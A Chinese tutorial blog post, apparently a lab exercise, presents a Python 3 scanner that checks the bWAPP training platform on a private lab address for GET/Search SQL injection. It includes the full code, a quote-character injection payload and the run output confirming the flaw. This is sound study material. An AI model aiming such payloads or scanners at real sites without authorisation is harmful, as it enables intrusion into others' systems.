python3—项目bwapp–对2017年的OWASP TOP 10中A1 injection sql 注入(get/search)进行Python3脚本实现
1、项目背景
服务器BWAPP平台:
在192.168.40.248机器上搭建了bwapp的安全测试系统
http://192.168.40.248/bWAPP/sqli_1.php
可以成功访问并可以进行安全测试
客户端:kali linux 192.168.40.181
安装了python3.6,当中包括的库有
ssl bs4 json redis urllib pexpect termcolor hashlib telnetlib pymysql pymongo
项目的所有文件在客户端上创建(所有的文件权限是755)
touch xxx.py
chmod 755 -R xxx.py
touch xxx.txt
chmod 755 -R xxx.txt
mkdir xxxx2、项目描述
2.1、项目涉及的所有文件–根目录
root@kali:~/bwapp# tree /root/bwapp
/root/bwapp
├── bWAPP.py
├── cookies.txt
├── injection
│ ├── __init__.py
│ ├── injectionmain.py
│ ├── __pycache__
│ │ ├── __init__.cpython-36.pyc
│ │ └── injectionmain.cpython-36.pyc
│ └── SQL_injection
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-36.pyc
│ │ └── SQL_injection_get_search.cpython-36.pyc
│ └── SQL_injection_get_search.py
├── pocdb.py
└── __pycache__
└── pocdb.cpython-36.pyc
5 directories, 12 files
root@kali:~/bwapp#
文件描述:
根目录:
bWAPP.py是主脚本代码文件
cookies.txt文件是保存每次登陆最新的cookies信息
injection是文件夹,该文件夹是指owasp top 10中注入类的漏洞,文件夹下包含各类注入类漏洞
pocdb.py是梳理OWASP TOP 10中所有类的漏洞类型,每一种漏洞类型下具体到每一个子实际漏洞对应自己定义的class类的字典
__pycache__是一个空文件夹,只是缓存临时信息bWAPP.py脚本代码
root@kali:~/bwapp# cat bWAPP.py
#!/usr/bin/python3.6
# --*-- coding;utf-8 --*--
'''
Aythor:xuweibo
description:bWAPP'main
data:Creat in 2018-05-16
'''
import os
import sys
import io
import re
import time
import requests
import warnings
import termcolor
from termcolor import cprint
from urllib.parse import urlparse
from injection.injectionmain import *
from pocdb import pocdb_pocs
from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool
warnings.filterwarnings("ignore")
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
SEARCH_HISTORY = dict()
#Version No. is :
VERSION = 'v1.0'
FLAGLET = '''
\-\ /-/ /-/ /-/-\ |-|-----------| |-|-------------|
|-| \ \ / / \ / / / / \ \ | |---------| | | |-----------| |
| | \ \ / / \ \ / / / / \ \ | | | | | | | |
| |_________\ \ / / \ \ / / / / \ \ | |_________| | | |___________| |
|_________ |\ \ / / \ \ / / / /_______\ \ | |___________| | |_____________|
| | | \ \ / / \ \ / / / __________ \ | | | |
|_________| | \ \ / \ \/ / / / \ \ | | | |
|___________| \_/ \_\/ /-/ \ \|-| |-|
'''
#print ("123")
threads_num = 10
#并行任务池
injectionpool = ThreadPool(threads_num)
def injectionprint(injectionname):
msg = ">>>Testing injection vulns...."
sys.stdout.write(msg+injectionname+" "*(len(msg)+10)+"\n")
sys.stdout.flush()
time.sleep(0.5)
def injectioncheck(injectionpoc):
injectionpoc.run()
def injectionpoc_check(injectionurl):
poc_class = pocdb_pocs(injectionurl)
poc_dict = poc_class.injectionpocdict
cprint(">>>Injection漏洞测试URL:"+injectionurl+"\t可用POC个数["+str(len(poc_dict))+"]", "magenta")
injectionpool.map(injectionprint, poc_dict.keys())
print ("\n")
results = injectionpool.map(injectioncheck, poc_dict.values())
injectionpool.close()
injectionpool.join()
def bWAPPMain(checkurl):
try:
#执行injection的测试漏洞poc检测
injectionpoc_check(checkurl)
except Exception as e:
print (e)
cprint(">>>>>>>>>>>>>>>>>>超时","cyan")
if __name__ == '__main__':
usage=FLAGLET+'''
使用bWAPP平台进行2017年的OWASP TOP 10 WEB安全漏洞演练
opt:
------------------------------------------------------------------------
-h Get help
-u Url
-l List avalible pocs
------------------------------------------------------------------------
Usage:
1.python3.6 bWAPP.py -u http://www.example.com 对URL执行所有POC检测(暴力)
2.python3.6 bWAPP.py -l 列出所有的POC
'''+'\nVersion is : '+VERSION
#print (usage)
if len(sys.argv) < 2 or sys.argv[1]=="-h":
cprint(usage,"blue")
elif sys.argv[1] == "-l":
#列出injction POC的名称
pocclass = pocdb_pocs("")
injectionclass = pocclass.injectionpocdict
print("\t\t\tInjection POC")
for injection in injectionclass:
print("|"+injection+" ")
print("|-------------------------------------------------|")
print("\r")
elif sys.argv[1] == "-u" and sys.argv[2]:
bWAPPMain(sys.argv[2])
else:
bWAPPMain(sys.argv[1])
root@kali:~/bwapp# cookie.txt文本内容
root@kali:~/bwapp# cat cookies.txt
PHPSESSID=4c0d4229f5d980eae7cb9a5551957209; security_level=0
root@kali:~/bwapp# pocdb.py的脚本代码内容
root@kali:~/bwapp# ls
bWAPP.py cookies.txt injection pocdb.py __pycache__
root@kali:~/bwapp# cat pocdb.py
#!/usr/bin/python3.6
# --*-- coding:utf-8 --*--
'''
name:poc's diction
author:xuweibo
descript:entry of main's API
'''
from injection.injectionmain import *
#是梳理OWASP TOP 10中所有类的漏洞类型,每一种漏洞类型下具体到每一个子实际漏洞名称(测试页面展示)对应自己定义的class类的字典
class pocdb_pocs:
def __init__(self,url):
self.url = url
self.injectionpocdict = {
"SQL injection(GET/Search)":SQL_injection_get_search_BaseVerify(url)
}
root@kali:~/bwapp# 2.2、项目涉及的所有文件–injection目录
root@kali:~/bwapp# cd injection/
root@kali:~/bwapp/injection# tree /root/bwapp/injection/
/root/bwapp/injection/
├── __init__.py
├── injectionmain.py
├── __pycache__
│ ├── __init__.cpython-36.pyc
│ └── injectionmain.cpython-36.pyc
└── SQL_injection
├── __init__.py
├── __pycache__
│ ├── __init__.cpython-36.pyc
│ └── SQL_injection_get_search.cpython-36.pyc
└── SQL_injection_get_search.py
3 directories, 8 files
root@kali:~/bwapp/injection#
root@kali:~/bwapp/injection# ls
__init__.py injectionmain.py __pycache__ SQL_injection
root@kali:~/bwapp/injection#
文件描述:
injection目录:
__init__.py是空的脚本文件
injectionmain.py是指注入类漏洞下具体的注入漏洞调用该漏洞的class
__pycache__是一个空的文件夹,缓存临时信息
SQL_injection是SQL注入的文件夹injectionmain.py的脚本内容
root@kali:~/bwapp/injection# ls
__init__.py injectionmain.py __pycache__ SQL_injection
root@kali:~/bwapp/injection# cat injectionmain.py
#!/usr/bin/python3.6
# --*-- coding:utf-8 --*--
#是指在目录injection下的SQL_injection.SQL_injection_get_search.py脚本文件导入自己的class类
from injection.SQL_injection.SQL_injection_get_search import SQL_injection_get_search_BaseVerify
root@kali:~/bwapp/injection# 2.3、项目涉及的所有文件–SQL-injection目录
root@kali:~/bwapp/injection# cd SQL_injection/
root@kali:~/bwapp/injection/SQL_injection# tree /root/bwapp/injection/SQL_injection/
/root/bwapp/injection/SQL_injection/
├── __init__.py
├── __pycache__
│ ├── __init__.cpython-36.pyc
│ └── SQL_injection_get_search.cpython-36.pyc
└── SQL_injection_get_search.py
1 directory, 4 files
root@kali:~/bwapp/injection/SQL_injection#
文件描述:
SQL-injection目录:
__init__.py是空的脚本文件
__pycache__是一个空的文件夹,缓存临时信息
SQL_injection_get_search.py是指SQL注入类漏洞中的get/search具体漏洞POC代码SQL_injection_get_search.py脚本代码内容
root@kali:~/bwapp/injection/SQL_injection# cat SQL_injection_get_search.py
#!/usr/bin/python3.6
# --*-- coding:utf-8 --*--
'''
name:injection SQL_injection SQL_injection_get_search.php (GETY/SEARCH)SQL注入
author:xuwiebo
description:文件SQL_injection_get_search.php中存在Get/Search的SQL注入
'''
import sys
import requests
import warnings
from termcolor import cprint
class SQL_injection_get_search_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {"User-Agent":" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
payload = "?title=1%27&action=search"
vulnurl = self.url + payload
#print(vulnurl)
cookies = {}
#参考https://www.v2ex.com/t/97347
f = open("/root/bwapp/cookies.txt","r")#读取根目录下的cookies信息
for line in f.read().split(";"):
name,value=line.strip().split("=",1)
cookies[name]=value
f.close()
try:
req = requests.get(vulnurl,cookies=cookies)
#print(req.url)
#print(req.status_code)
#print(req.text)#打印请求回包内容
if r"You have an error in your SQL syntax" in req.text:
cprint("[+]该页面SQL_injection_get_search.php 存在SQL注入漏洞...(高危)\nplyload: "+vulnurl, "red")
except:
cprint("[-] "+__file__+"===================>连接超时","cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = SQL_injection_get_search_BaseVerify(sys.argv[1])
testVuln.run()
root@kali:~/bwapp/injection/SQL_injection# 3、实际运行情况
root@kali:~/bwapp/injection/SQL_injection# cd ..
root@kali:~/bwapp/injection# cd ..
root@kali:~/bwapp# clear
root@kali:~/bwapp# python3.6 bWAPP.py -u http://192.168.40.248/bWAPP/sqli_1.php
>>>Injection漏洞测试URL:http://192.168.40.248/bWAPP/sqli_1.php 可用POC个数[1]
>>>Testing injection vulns....SQL injection(GET/Search)
[+]该页面SQL_injection_get_search.php 存在SQL注入漏洞...(高危)
plyload: http://192.168.40.248/bWAPP/sqli_1.php?title=1%27&action=search
root@kali:~/bwapp# root@kali:~/bwapp# python3.6 bWAPP.py
\-\ /-/ /-/ /-/-\ |-|-----------| |-|-------------|
|-| \ \ / / \ / / / / \ \ | |---------| | | |-----------| |
| | \ \ / / \ \ / / / / \ \ | | | | | | | |
| |_________\ \ / / \ \ / / / / \ \ | |_________| | | |___________| |
|_________ |\ \ / / \ \ / / / /_______\ \ | |___________| | |_____________|
| | | \ \ / / \ \ / / / __________ \ | | | |
|_________| | \ \ / \ \/ / / / \ \ | | | |
|___________| \_/ \_\/ /-/ \ \|-| |-|
使用bWAPP平台进行2017年的OWASP TOP 10 WEB安全漏洞演练
opt:
------------------------------------------------------------------------
-h Get help
-u Url
-l List avalible pocs
------------------------------------------------------------------------
Usage:
1.python3.6 bWAPP.py -u http://www.example.com 对URL执行所有POC检测(暴力)
2.python3.6 bWAPP.py -l 列出所有的POC
Version is : v1.0
root@kali:~/bwapp# root@kali:~/bwapp# python3.6 bWAPP.py -h
\-\ /-/ /-/ /-/-\ |-|-----------| |-|-------------|
|-| \ \ / / \ / / / / \ \ | |---------| | | |-----------| |
| | \ \ / / \ \ / / / / \ \ | | | | | | | |
| |_________\ \ / / \ \ / / / / \ \ | |_________| | | |___________| |
|_________ |\ \ / / \ \ / / / /_______\ \ | |___________| | |_____________|
| | | \ \ / / \ \ / / / __________ \ | | | |
|_________| | \ \ / \ \/ / / / \ \ | | | |
|___________| \_/ \_\/ /-/ \ \|-| |-|
使用bWAPP平台进行2017年的OWASP TOP 10 WEB安全漏洞演练
opt:
------------------------------------------------------------------------
-h Get help
-u Url
-l List avalible pocs
------------------------------------------------------------------------
Usage:
1.python3.6 bWAPP.py -u http://www.example.com 对URL执行所有POC检测(暴力)
2.python3.6 bWAPP.py -l 列出所有的POC
Version is : v1.0root@kali:~/bwapp# python3.6 bWAPP.py -l
Injection POC
|SQL injection(GET/Search)
|-------------------------------------------------|
653
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
